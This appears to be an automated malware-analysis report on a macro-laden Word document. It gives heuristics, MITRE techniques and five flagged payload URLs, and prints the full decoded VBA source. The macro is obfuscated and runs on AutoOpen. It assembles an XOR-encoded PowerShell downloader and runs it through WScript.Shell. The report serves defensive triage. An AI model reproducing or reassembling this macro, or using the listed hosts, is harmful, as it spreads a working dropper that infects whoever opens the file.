MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The macro utilizes WScript.Shell and CreateObject, indicating an intent to execute arbitrary commands, likely to download and run a second-stage payload. The presence of 'powershell' in the script suggests it may be used to launch PowerShell commands.
Heuristics 10
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
MiahWM = qTPnr / wFQaav + (87921 * ZRjGIf * 52423 * 46874 - (66540 / jfZUo / fOiRUa - 89723 * (94297 / owLfXI))) MbJZQOHjqc = lzjcdjZal + CreateObject("Wscript.shell").Run(SSavX + Chr(vbKeyP) + rvwOXLPzZWJ + Chr(vbKeyO) + wfXoZWAKVpQ + orzsYzMTq, 472733228 - 472733228) WsIEW = ZZRGl / DnRRfh + (58820 * ABYZSD * 73432 * 2329 - (95085 / jrarA / FJTImd - 71491 * (31934 / VdPiU))) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
MiahWM = qTPnr / wFQaav + (87921 * ZRjGIf * 52423 * 46874 - (66540 / jfZUo / fOiRUa - 89723 * (94297 / owLfXI))) MbJZQOHjqc = lzjcdjZal + CreateObject("Wscript.shell").Run(SSavX + Chr(vbKeyP) + rvwOXLPzZWJ + Chr(vbKeyO) + wfXoZWAKVpQ + orzsYzMTq, 472733228 - 472733228) WsIEW = ZZRGl / DnRRfh + (58820 * ABYZSD * 73432 * 2329 - (95085 / jrarA / FJTImd - 71491 * (31934 / VdPiU))) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "XwdVbDfBXDFjfI" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.fraisedolfi.com/AZjoB6/ Referenced by macro
- http://www.dslabc.org/1GOh0/Referenced by macro
- http://www.cian.ciancenter.org/images/CKPZW/Referenced by macro
- http://coreteam.casperon.com/giXotny/Referenced by macro
- http://www.athlete-psychology.com/Nl61/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17979 bytes |
SHA-256: aba2ba145f64789bd2e540ac83eabc4020df53d8e2e1cede65b380f717c7eee8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
366 of 607 identifiers look randomly generated (e.g. 'XwdVbDfBXDFjfI') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zqvAMaDK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XwdVbDfBXDFjfI"
Sub AutoOpen()
On Error Resume Next
GmvkaQ = (48787 - SFIFY + wZrAEN + MjQuNN - (91216 * cNRZtN / 73025 * swbOf))
iUYwA = (90715 - ifprMw + toJKm + YJcXr - (76209 * YwOui / 98538 * JRasl))
SAjmww = (52397 - skCqV + clsjK + OVsmwo - (73289 * rUaZSd / 42264 * MtSPLO))
tGpFE = (8570 - aanYwu + fpNDd + qrrjf - (64440 * LzDdw / 30115 * pJFHJ))
oYGpTN = (77859 - EWiFRi + ZRGPru + qifuw - (28064 * Qlhzl / 55876 * XHjNI))
wUEOGq = (77063 - vhmzob + SbNfW + SdizA - (51830 * AiqISu / 58363 * GLbzY))
NBmdAv = (37252 - hCjYkJ + BPJaW + YaWKZi - (77089 * VkFtm / 16890 * EOfjOb))
aUZMd = (99659 - jtVih + XicKZQ + jnkBH - (62720 * nCJZC / 67220 * rVESRw))
HdEsGCPBSK (ZBHfF + XviVmq + hNELiADf + WwifhnI)
asfoV = (76609 - jAhbP + HkHVd + ElXIAA - (91867 * iNstSp / 958 * iZJGZN))
HMTFA = (39564 - mfNUw + BlUTRM + JWEzcM - (31800 * OXMUC / 10887 * YbZwW))
fWPzP = (8268 - WvzGw + UmjYEw + Wikvfw - (83789 * MYsIUV / 8121 * UBscv))
OplEhw = (74457 - GwKSo + jinZL + SHnIZ - (39939 * FhMWO / 80947 * ITPwOd))
End Sub
Function ZBHfF()
On Error Resume Next
lDjUTt = (uSJXl + kOJiT / 41526 / 39703 - (DOzXO + bnHFY / JUhsDb + bHXQN))
OjQttH = (qziGNb + VsokG / 91813 / 3016 - (mzkWVv + lZYuF / BpZkih + QwqiwV))
jCCpIL = (ASiphw + ivGLD / 97265 / 73022 - (QjQirI + Mfzlah / Ywzuv + rmsLGW))
acZFXc = (DwHOwZ + HTucwJ / 6271 / 69866 - (qwJAMi + Tiqdd / hwsZn + irRaO))
lkvrFrocRr = "wershell " + " " + " " + " & " + Chr(40) + Chr(40) + "vARI" + "aBlE " + "'*MDR" + "*'" + Chr(41) + ".N" + "aME[3," + "11,2]-jO" + "IN''" + Chr(41) + " " + Chr(40) + " " + "-JOi"
BQUGPb = (wpBsri + UoKJU / 73004 / 55735 - (OtiSdj + cPbOOd / zbaIqw + swzIA))
kjAPkz = (JsADM + qIhTF / 97992 / 85838 - (uiHYGi + Uiqjav / topmV + DSTjK))
OIJLYO = (Bbcwz + FNmQc / 29549 / 83824 - (pjiMvi + WwjKd / cUFPqA + cXziK))
jAMNPK = (mVYdTT + GCsvW / 44028 / 36656 - (HLJCm + doFXUb / LTkWP + ZCZVac))
srSfhlXNO = "N" + Chr(40) + " " + Chr(40) + " 26" + ", 79," + " 109 ," + "88 ," + " 3,80" + " , 91," + " 73,19 " + ", 81," + " 92 ,84," + " 91 ,93" + " ,74" + ",30 , 112"
EwGIR = (RChiSX + BrUWsI / 61405 / 25735 - (hHJoo + EYaIiw / dquUi + FkvPpS))
zsDsrZ = (RZiii + kHoWw / 42230 / 97815 - (PNkUwY + zClZw / RZhMK + Uaqncm))
dGTuTG = (lOzwdC + zJDJpt / 62384 / 26862 - (cYazIi + sUVIAw / fobLj + rwqjt))
tLGfVt = (AZYaz + kWffwm / 38017 / 26858 - (tjBmOo + RkEBH / rPRLRU + DviPMQ))
GiaWkV = " , 91,7" + "4 ,16 ,1" + "05 ," + "91 ,9" + "2, 125 " + ",82,87" + " , 91," + " 80 ,74 ," + "5 ,26,112"
HFUiDT = (RCmFQH + zEjhE / 16194 / 84118 - (mDpvrr + nJEQd / hhwlu + dzdHlH))
jjmkR = (lGJWTj + qCQrKp / 99972 / 4160 - (ujTKJm + cpObu / QMBOz + zrlbD))
IuKDX = (pSSRpH + COPdAA / 58016 / 45117 - (WivJb + pJwEo / jHcFh + njOQI))
arFAY = (PcqWt + iCcHi / 14237 / 89288 - (wDXVNi + zljhtF / IvnTz + kVOJu))
TYcaddAz = ", 92" + " ,86,3" + " ,25" + ", 86 ," + " 74,7" + "4,78 ,4, "
DOZHFS = (HzfjiF + GCVkn / 17175 / 2064 - (bIioHC + pjnOSa / ihUDs + Bwuzs))
BMGFv = (KKKJw + mFmMmR / 7289 / 81069 - (VcXAi + HoaWn / zdihwK + HhmpJ))
uELCBA = (PmQcRL + YIwvUm / 82175 / 7176 - (nPjQh + cNfvOI / djmOmL + SFDsz))
SiPjzG = (dAqXcI + TbdJU / 70760 / 37179 - (TGnYT + qnDGZR / zwFJqT + Tsjzz))
dvJPMZkJpiX = "17 , 17, " + "73,73 " + ", 73, 1" + "6,88, 7" + "6,95 , 87" + ", 77 " + ",91 ," + "90 ,81 " + ",82, 88 " + ", 87 " + ", 16 ,93,"
JRSsM = (wYaMCJ + wpQAzu / 46651 / 44771 - (OziRaF + QTzvBs / DzPkB + MObmC))
PIivP = (OmqYG + Djobb / 35732 / 24043 - (iovflR + YWpbM / fmadwB + ioXcip))
pXXioR = (NCUNuA + dJsFNw / 11770 / 64931 - (DiJWP + AWsPmQ / toIiJ + EjjUkL))
tCziGC = (kXnSjw + JCwVzj / 90007 / 59333 - (JGzfn + iLrQm / aOApLS + GtTinh))
wIOGjWzPD = " 81, 83" + ", 17,12" + "7 ,100," + " 84 ," + "81 ,12" + "4,8,1" + "7 , 12"
ZJYAqG = (nMTNUb + FHrMhD / 83426 / 90276 - (CJcAL + YiKmT / CtzPS + DsFpFm))
ClOoW = (XmRZqS + iiAiF / 68097 / 82684 - (YzBVIR + qMSwFZ / rFYDZO + Madrwi))
HTmiRa = (iwWrNG + RooDh / 14750 / 57561 - (NtwPH + CEMDpA / DlzsM + nDXGCL))
CVVYFh = (LUwiu + cCwVfN / 49926 / 13225 - (Dwinb + cTNZLl / iATJFI + Zrikh))
EEHXQXsuiK = "6, 86" + ", 74" + " ,74,78" + " , 4 " + ", 17, 17," + "73,73, 7" + "3 ,16 ,90" + " , 77" + " ,82 , 95"
zthoi = (EqjDfK + dwGrD / 15661 / 54808 - (BQolW + aRitjj / bWjVs + XwulvJ))
tlMJOS = (FOXAbb + GfGPF / 74697 / 95696 - (vcGiIN + QRJXTb / ipbUQz + iwMwb))
VQXGJq = (kwctCI + dZEJwi / 15544 / 5408 - (XWKhFX + fsbWd / tXjth + cupSk))
mDQmYf = (EFshB + wbuJn / 45636 / 11940 - (OCpKU + qwqnu / dBwoa + KfzztR))
KlsXvv = ",92," + " 93, 1" + "6,81 , 76" + ", 89 ," + " 17, 15" + " , 121, 1" + "13 , 86" + " ,14,17," + " 126 , 86"
ZBHfF = lkvrFrocRr + srSfhlXNO + GiaWkV + TYcaddAz + dvJPMZkJpiX + wIOGjWzPD + EEHXQXsuiK + KlsXvv
WTOaG = (cFAIE + NqJiEP / 22973 / 57820 - (kBYaV + UzATsL / kmiLn + pEWhiL))
kzorw = (aqIBw + IrHSjZ / 14041 / 65635 - (btHiH + wmtpS / XqisL + mkKHBw))
kdGFsp = (pmRpA + NIHzoL / 41134 / 95109 - (Wwtcj + UNUtPW / rqvbD + awUsKB))
tWpbzf = (SoAkzI + MswAam / 32584 / 36109 - (jaCwja + hDaBLB / DtwfL + tnkkn))
End Function
Function XviVmq()
On Error Resume Next
rMjZF = (BsIsC + Ntwkvw / 55327 / 93553 - (MmazU + ujDIY / ABFzK + hMUIq))
uPFZX = (ZnQQfS + KNiVEG / 56665 / 80893 - (WwhVVM + SfkVCN / RiiHJ + wqsYwQ))
fvtzFz = (TTJiaG + lSGMF / 69781 / 57474 - (Msslk + vkhDww / YJvaF + ElrWfs))
hwWsT = (BiGKMQ + dUYzv / 71664 / 28404 - (QQENI + XIBDia / HYrba + Vilji))
skwWVf = ", 74" + ",74 " + ",78," + " 4,17, " + "17 ,7" + "3 ,73" + " , 73,"
acviin = (wLUMfi + GYqwjf / 84822 / 13767 - (fUtNT + zizcL / XbBcjE + vEAamn))
OvAli = (GvWDB + ZOfsb / 26820 / 91844 - (FDaoFv + AWfHU / hGZNGU + ZiDwoc))
KMzHw = (TWPJla + ZLqNC / 44225 / 96289 - (wpTAbH + BfuGa / Mmisf + dBLrr))
fPGHDG = (JjBGUN + YjcbiH / 11540 / 24479 - (LlzEZ + VVNszA / dZAqBK + IoGsjj))
ATKznj = "16 ,93,87" + " , 95,8" + "0, 16 ,9" + "3 ,87 , 9" + "5,80," + "93 , 91 "
VjRQXp = (Whtnzk + bsMlBp / 64608 / 77646 - (TzTDpb + sQwRX / zmpTS + fbMBZ))
iUjbc = (HPwLC + ALUBc / 49086 / 7325 - (dpjhr + mOCNJN / MUABJV + mdzQl))
ntQLOw = (jozQDl + ujBXD / 35598 / 21788 - (vZviX + IQHwu / BijjC + YqRzWm))
jLkOn = (PpjNX + HVkIUk / 29510 / 58147 - (UMYLVX + Vhkzc / svbnsW + lRzPwk))
kErHdGS = ",80,74 " + ",91," + "76 ,16 ," + " 81 ," + "76 , " + "89,17 "
jUiELr = (bEJml + ioiwB / 41594 / 35009 - (FEPoY + MiFwZM / uAtAsG + RwBAO))
zSsJDc = (IGBEU + MGPBnF / 59242 / 27418 - (NiXSV + UcFDwc / BLmzho + uIlwF))
FNPLkc = (HiQSQm + AzzMM / 47525 / 22760 - (okvIPC + IDPaw / wOtMwZ + QkakFF))
MTwZow = (bSzrP + YYYYqS / 18333 / 39600 - (MzUUD + UDvDJA / AKqSA + qjksRW))
lZMjvUSoOn = ", 87 , 8" + "3 , 95" + ", 89, 91," + "77, 17,1" + "25,117 ," + " 110 ," + " 100"
FutYCP = (LirIi + vpLti / 71059 / 32872 - (ojwRo + omkWct / VKLXb + BEDRiv))
phuWXu = (pMksn + qquVU / 9115 / 47737 - (zYLwb + Fwizb / iJrdh + QlTawS))
raZas = (BDRNu + NhkYt / 41448 / 62496 - (BZfAVG + PTkOQ / jqOMJ + QsTEwR))
Uzonp = (RZiPb + kGWND / 80436 / 78080 - (CjFAQ + YXEKLC / nhKOc + jTYjik))
GhvtNzrlit = ", 10" + "5, 17 ,12" + "6 , 86,74" + ", 74 ," + " 78, 4,1" + "7 , " + "17, 93 ,8" + "1 ,76," + " 91, 7" + "4 ,91" + " ,95,"
cFBdH = (FzqSnS + XIZus / 89820 / 88543 - (aUZza + XjdkaF / nPGou + aCUXLi))
ErEGjY = (nihMuT + ElJYw / 22693 / 83072 - (uOnvGj + VHRCY / ALpwwl + bKkDUA))
XTkqK = (GJBlbi + zhNMhM / 24974 / 96176 - (sTGzST + FwOUF / EwnZA + JmiiKN))
ODRfJ = (CGGRuZ + mLlkj / 98297 / 57855 - (hrWLkr + wiVii / rzwoa + OPZZT))
VlHpELGQfpn = "83, 16 ," + "93 , 95, " + "77, 7" + "8,91 ,76 " + ", 81,80 ," + " 16," + " 93 " + ",81, 8" + "3,17 ,89" + " , 87 " + ", 102,81 "
BsQDOj = (zGsHT + tINsLl / 36723 / 99917 - (lnGsii + IjIVIq / kiIMtD + NSDDFf))
qpRAl = (Oaihm + hrMdo / 55822 / 36344 - (vwhwH + rAhWvT / mGZWv + oMmPZc))
tDoJzG = (cwVFv + zJwzj / 4788 / 18338 - (NDZZwP + VDpYz / PfULJk + HimHwC))
spIpwR = (oaRkN + mHvpN / 19328 / 53093 - (dOZIMO + wOovkp / MzHPCj + djCMsL))
VupJjiOl = ", 74, 80" + ", 71,17 " + ", 126," + "86 , 74 " + ",74," + "78,4, 17," + "17, 73" + " ,73," + " 73,16" + ",95, 7"
XviVmq = skwWVf + ATKznj + kErHdGS + lZMjvUSoOn + GhvtNzrlit + VlHpELGQfpn + VupJjiOl
vIRwlp = (uzQkcA + QIYNub / 18329 / 50487 - (nNbat + fatsO / QtVmT + vMamSj))
pGaCAz = (pTslEw + jzKIJR / 11557 / 90561 - (KSXwz + KTXJX / JqXuhr + idkYf))
wVEWi = (aVBdl + PzdRp / 82111 / 69553 - (bzPDba + NOfAvu / zvbEP + ojOPkc))
ETFTDV = (fAOkC + kHsfjv / 3692 / 66232 - (ilaRRW + QRauhS / zWVdi + fFbGuH))
End Function
Function hNELiADf()
On Error Resume Next
jbDlpk = (OiwJjQ + SwbYu / 77169 / 47594 - (YZSSs + INsIa / qANoNH + NlROn))
LibYs = (uMCalE + UmwpL / 11698 / 65698 - (hlSocZ + QaCrQb / NXXsN + mTtJO))
BGqrUP = (ViDiTW + iFQDAJ / 65462 / 41602 - (inLmO + TGLip / CRWXtA + MziUq))
dSulw = (ulwFBu + GMHWd / 80209 / 30582 - (Chqlb + wvlzTz / UuTuE + zbAqZ))
hhYidAZbsHJ = "4 ,86" + " ,82" + " ,91 " + ", 74,9" + "1 , " + "19 ,7" + "8 , "
VorBfZ = (Bwozu + YXtozP / 29092 / 3871 - (OCXwd + bWpriL / Cadws + SVTVqz))
CBBPfK = (LTahG + ZWVHl / 77889 / 9519 - (GMDVpl + SicRqT / ISknK + MkXLr))
lTvZvc = (OZoijw + aazFP / 57021 / 16696 - (SLAXj + lvhhBr / IaPvC + BcmzQv))
rHVNN = (ujpHEJ + LJKwTp / 62733 / 2207 - (oujHIV + TASUX / Dwtzz + KNJROQ))
rtjIvfk = "77 , 71," + "93, 8" + "6,81, " + "82,81" + ", 89 , 71" + ",16 , " + "93, 81 " + ",83, " + "17 ," + " 112 , 82" + ", 8 ,1" + "5, 17, 25"
uHrUm = (Dalsl + rMmAwP / 75213 / 80679 - (IYniU + nMNhs / bvqws + oqKSJ))
XJsYwf = (krJZv + FMaWYU / 44862 / 76466 - (YAmCop + qMKItl / BitAJ + kLSus))
zIzNjO = (HCsli + qSGPO / 46212 / 19790 - (kPRwBE + wzIpPq / LQZcwf + IjJHuC))
rvTPa = (dQAjY + srciG / 93567 / 60539 - (GSzkJ + tHsfM / bUrqbS + hOtHr))
zAXPcJQZ = " , 16 ," + " 109," + " 78 ,82 " + ", 87,74," + " 22 ," + "25, 1" + "26, "
zrjGM = (Ufvicc + nFDLm / 8718 / 37767 - (IOOicc + zmWqUc / kFjsA + GPwtF))
nUbGzN = (jtzslK + TvkMX / 54557 / 50379 - (YtiXB + bpnFj / lLjVhu + aJmXnC))
LVFbki = (pocUck + VfJMl / 14115 / 66129 - (VwfuEz + sQUZsR / uKlHmm + HlEIw))
iawuw = (MsfRh + LJCjw / 35828 / 26690 - (GqplZ + IcjHoH / mPYMu + mUSkI))
NQbCioKhaD = "25 , 23 ," + "5 ,2" + "6 ,122,11" + "2,11" + "3, 30 , 3" + ", 30 " + ", 25 , 7"
frturG = (NJOzb + MwtZf / 58576 / 18103 - (IUTwjY + CjNEbO / UDont + IqDbz))
TvlCR = (JqIKi + GImuVE / 43605 / 75367 - (Jhmaz + MwifAT / ASaYU + oKdThw))
lsQDo = (pBXXa + IhPLdB / 88712 / 99603 - (tbqkr + EbSQrz / nGmcZB + Nvzcrf))
bGlIz = (czGvq + kNvLzC / 83290 / 74092 - (kwadVv + NMalH / AmiMbr + inPvdB))
JJvOPV = " , 9,9,25" + " ,5 , " + "26, 111 " + ", 12" + "3 , 12" + "0,3 , 26 "
STCCA = (tpfrrz + wGSMM / 40434 / 53269 - (XJkzqa + lnqFEE / iwRLHF + hKRqA))
nqqtt = (RjYMa + jLsnLa / 69209 / 87262 - (vzsZv + wTMrwJ / BInUz + HiFtn))
CpWtY = (pvJSC + IRErA / 72535 / 86534 - (VcWuA + WLpzT / qZZvQ + hsPjUd))
pzMCh = (ArRZTw + lZEHj / 95765 / 54203 - (JZAbsN + wdOtMZ / dFOJC + vpMJdi))
vjdcJz = ",91 ,80 " + ", 72 , 4 " + ",74 ,91" + ", 83 , " + "78 ," + " 21,25 ," + " 98 , 25"
PSEjB = (LYuDUr + pScCb / 51535 / 16339 - (wYbWMn + AVtUjz / wjMfv + JEKuEw))
FWClaL = (WhQvHO + bwlqS / 51971 / 94018 - (zHiGTL + Ontjnz / wNOvOJ + wmolj))
wTkNK = (TRucJo + jYZJz / 16172 / 36316 - (Wtpwi + jtOhS / Tdjkj + IfzBG))
BznPp = (fzlfa + csLqd / 12131 / 18415 - (tTisIb + EAzoH / fwNivz + nMEuzc))
ksidcIFQq = " , 21," + "26 ,122 ," + " 112 ," + "113 ,21, " + "25 ,16 ,9" + "1 ,70 , 9" + "1 ,25" + ", 5, 88," + "81 ," + "76 , 91"
Zqhbw = (vSfEk + JSBEt / 60629 / 91219 - (HpKtww + FNkXP / jjcar + LHTUIb))
dDvbU = (MRIzt + XFvqWG / 76844 / 18298 - (tmlIS + TmMDl / MLzsw + aZniV))
ijzWjI = (azjfnd + cpEvhV / 98616 / 54594 - (YdBpjm + VCSRPs / rDOjq + zznOri))
qsDli = (uvdvb + vQjFkX / 62824 / 89965 - (YkFroc + AnZVml / mSwPN + XmXBFo))
YtKLGSNCKrO = ",95, 9" + "3 , 86,22" + ", 26 " + ", 84" + " ,68," + "100 " + ",30 ,87 ," + "80 ," + " 30, 2"
vfhvj = (iioSUH + iIfnPl / 18545 / 35993 - (RsiIfu + PFjQPi / VSmvZ + fimQI))
lURCI = (iCiIRY + OwCsU / 96064 / 37737 - (TAKbap + OSWIF / zGYkp + lVNTt))
uGhwh = (tBOpRY + nBYMnr / 23437 / 6901 - (KVcqkv + mFNzY / bhHzj + dvjBO))
PZaGh = (zasfS + oJOcVL / 67319 / 70242 - (MrSoIs + bqmzBU / vbLkI + jwYwjC))
rZBiKwj = "6 , 112, " + "92 ," + "86, 23" + ",69," + " 74 ,76" + ",71 " + ",69,26" + ", 79 ,1"
hNELiADf = hhYidAZbsHJ + rtjIvfk + zAXPcJQZ + NQbCioKhaD + JJvOPV + vjdcJz + ksidcIFQq + YtKLGSNCKrO + rZBiKwj
wsLMc = (HjBMMT + UcOBtt / 60216 / 72271 - (uJlWhm + tmwiqY / WhtmY + PWWNoF))
YqTwzp = (zwPMLP + dsSsG / 710 / 215 - (iGdPV + iuVSj / RjjhWZ + BdsIu))
mcwOPn = (wCbFz + iHZOk / 83351 / 90537 - (rUAGG + ZXmXib / LRokT + RJUGn))
lVGSzZ = (DvwMVr + zmbjDY / 43518 / 75929 - (qFnKp + DdTOqz / HUGnD + EfVmH))
End Function
Function WwifhnI()
On Error Resume Next
ckatPG = (EhShTu + KwkkRi / 5945 / 50581 - (hDiolm + RmlYJU / NRoLD + atARS))
FjiEC = (QjrRM + KIjIXu / 70896 / 77337 - (XQAlI + FlGjuA / itaTL + CTjzOz))
UwOwUh = (wtpjR + RtBuh / 42630 / 39371 - (oXTdTz + MoDRV / SpCqQq + WQXlW))
DOIzIc = (KRuIzH + whbPD / 45446 / 44841 - (XqldR + dJXNMT / aRaiv + RiQJqd))
JXqSQDjVoYs = "09 ,8" + "8 ,16, " + "122 , 8" + "1 , 7" + "3, 80, 8" + "2, 81, " + "95 ,90" + ", 120,8" + "7 ,8" + "2 ,91 ,"
lIdlt = (ZpSlu + jwiYMj / 27748 / 4454 - (BAvOEc + twnUTj / KkFzSa + QzScdj))
PJikK = (XZzmDa + CPliIb / 26835 / 20940 - (ULzPBr + SNqqfA / jiMNJ + OaOMvh))
CCchfO = (IhXpkw + VwaQzK / 39818 / 77134 - (mwbMl + dlbts / uKmoVF + DhHhc))
mHZwT = (wCjbvS + hdmFl / 27197 / 94079 - (zEwEQ + NTXzhH / NRmpk + WrlNH))
HQjPLPiO = "22 , 26,8" + "4,68" + " , 100, 1" + "8 , 30, 2" + "6, 1" + "11,123, " + "120,23 ,5" + " , 10" + "9 ,7"
zcHfjr = (vikaSv + qqSsu / 41471 / 49499 - (tawdjk + iVbXs / AMFKRA + CsKGjq))
SGwzwt = (XjSKDj + UvdWL / 42401 / 9225 - (IBRLTX + ccUlrJ / VkclZb + Xtiqrz))
CQzwiI = (jhjDL + nzPwu / 5361 / 53280 - (iMhdVz + APpwqD / SXftk + QfWHG))
uwrLfZ = (OvqkD + wFDlO / 83767 / 10717 - (boncc + SkZiO / aqEmZv + icwTB))
hblatM = "4 ,95" + ", 76 ,74" + " ,19 ," + "110 , 76 " + ", 81 , 9" + "3 ,91,"
SuJzS = (IdZVA + OrfFA / 5542 / 72521 - (SFYmCQ + XpLaD / daDpUQ + JOcXlw))
jaDhN = (BldFUl + KKIRYO / 79783 / 94016 - (wiLNPm + zzUjHS / CslMZl + HSlJT))
tYBRi = (bqMVX + CDkoOv / 92773 / 35300 - (QcPfms + EdBADG / zntrf + nNhSX))
mCdMMd = (rXEPT + JRjRt / 12148 / 40526 - (hhrTB + GZzpa / hMnXD + TbMiNI))
vwBGlbid = " 77 ,77" + " , 30 , " + "26 , 11" + "1 , " + "123,120," + " 5 ,92 ," + " 76 ,91 ,"
NDMiX = (qvJTl + CHGai / 29071 / 15181 - (hCSoA + iPBAs / iLjdm + ltjzOO))
CiNwiR = (oZuXY + caApdX / 55187 / 69885 - (UuKVP + hwMIQW / YhAdGw + FUBnq))
TErOi = (mffXLl + dFtbu / 17980 / 51737 - (iqXdo + dOihn / YhNmB + NFszo))
pZZOb = (fZdvml + ftljTW / 86647 / 92685 - (lAUDQw + CvzHYC / iOZLY + oDBIvz))
VNGZWcjT = "95, 85 " + ", 5 ,6" + "7, 9" + "3, 95" + " ,74, " + "93,86," + " 69 ,67" + ", 67" + Chr(41) + "|" + " % { [ch" + "aR] " + Chr(40) + " $" + "_-bx" + "oR " + Chr(34) + "0x"
uwYzq = (owQPml + YmLsl / 6948 / 87879 - (Vnptm + IWZEzz / fQRTmU + otdim))
zTQfbw = (zzAKOH + uijJSj / 17946 / 22021 - (AQpKC + MpRcDt / JsUYtf + waLpL))
GQmha = (RMZIjE + FfcqK / 73736 / 74662 - (tVuZwj + SbKGHS / rjriN + VFIhPi))
sODfA = (EFnBo + TlqmJ / 32137 / 782 - (XhzwsG + YvVVf / zlaww + ZchQW))
STGicvuuMfC = "3e" + Chr(34) + " " + Chr(41) + "}" + Chr(41) + Chr(41) + " "
WwifhnI = JXqSQDjVoYs + HQjPLPiO + hblatM + vwBGlbid + VNGZWcjT + STGicvuuMfC
UEnMfi = (Jlqir + jBnbBE / 85300 / 31540 - (IKsRtd + FtqhwG / icRrd + iniKDA))
LEcGJ = (RzikS + mXuJa / 64745 / 62853 - (LhMmaH + pwasC / iNBsj + GsSqf))
TQQmn = (jwcUN + kjfznJ / 81842 / 49703 - (IwkMOX + UbiOs / HpcEub + HCIDCs))
YLDTw = (dNvsIb + ctwwc / 94641 / 71233 - (otzjYF + nNMKP / QGYqK + oIwqj))
End Function
Attribute VB_Name = "wmzIWLjuvVjNp"
Function HdEsGCPBSK(wfXoZWAKVpQ)
On Error Resume Next
SmjTz = IBXQRa / OplfFE + (70801 * SizMd * 25875 * 62859 - (26189 / EiNWuO / qJcsj - 72360 * (90103 / zFjJr)))
DLAor = uoSOb / poPZmo + (51857 * TkMIfq * 72025 * 57174 - (44219 / lNADJJ / BkILU - 45375 * (67388 / zcBZsi)))
CdiMZ = itZwcr / QPrLij + (42474 * pADIs * 20976 * 74448 - (82931 / BAbCRm / BDLNt - 46075 * (23237 / UlifdV)))
JzkMcb = hVwCj / cQswda + (19065 * VIcSoJ * 78708 * 12395 - (61730 / NUVqb / FJpzW - 79066 * (34452 / oRRDtf)))
vKcwC = aouKM / ALZZPt + (45443 * wsRpL * 36384 * 72527 - (48595 / mtiGL / iizJa - 91847 * (86672 / ssGzfd)))
qCnRt = OjaSkL / MZdQU + (89640 * QcbwW * 68222 * 27028 - (39538 / PtLwMo / hXCFA - 96201 * (82027 / pjqfO)))
TntLA = kGWfc / nLmNHT + (52965 * pwbrU * 62722 * 76392 - (93409 / XhXWN / qTLuKk - 67981 * (75621 / QwwjPk)))
MiahWM = qTPnr / wFQaav + (87921 * ZRjGIf * 52423 * 46874 - (66540 / jfZUo / fOiRUa - 89723 * (94297 / owLfXI)))
MbJZQOHjqc = lzjcdjZal + CreateObject("Wscript.shell").Run(SSavX + Chr(vbKeyP) + rvwOXLPzZWJ + Chr(vbKeyO) + wfXoZWAKVpQ + orzsYzMTq, 472733228 - 472733228)
WsIEW = ZZRGl / DnRRfh + (58820 * ABYZSD * 73432 * 2329 - (95085 / jrarA / FJTImd - 71491 * (31934 / VdPiU)))
HIaIOl = ECLqft / FtDEw + (34758 * kpBjwf * 82569 * 31753 - (98236 / YONpb / DDXsJ - 63574 * (6632 / ljwzq)))
UwILY = snkkc / fHRin + (77480 * qrPjzH * 5971 * 29489 - (47866 / FVGwsS / aunRpv - 29161 * (49750 / uNVbNT)))
omYEM = DVnUp / OWFmpU + (9001 * BZAwAJ * 98758 * 25648 - (79905 / zjlLRJ / NjPqR - 56323 * (41471 / jKbob)))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.